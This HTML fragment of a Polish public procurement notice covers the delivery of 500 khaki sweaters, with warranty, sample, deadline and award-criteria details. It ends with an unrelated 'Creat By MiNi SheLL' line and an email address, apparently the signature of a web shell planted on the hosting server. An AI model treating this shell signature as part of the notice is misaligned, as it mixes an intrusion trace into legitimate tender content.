<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa 500 sztuk swetrów koloru khaki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa 500 sztuk swetrów koloru khaki.
Wymagany okres gwarancji na przedmiot zamówienia wynosi minimum 12 miesięcy od daty wydania przedmiotu zamówienia do użytkowania.
Okres przechowywania przedmiotu zamówienia przez Zamawiającego w magazynie wynosi maksymalnie 5 lat.
Wykonawca zobowiązany jest do dostarczenia wraz z ofertą wzoru oferowanego przedmiotu zamówienia w pierwszym stopniu jakości, tj.:
sweter koloru khaki w ilości 1 szt., dla wymiaru: 
wzrost 175 cm, obwód klatki piersiowej 88-94 cm..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 18.23.53.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 56.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com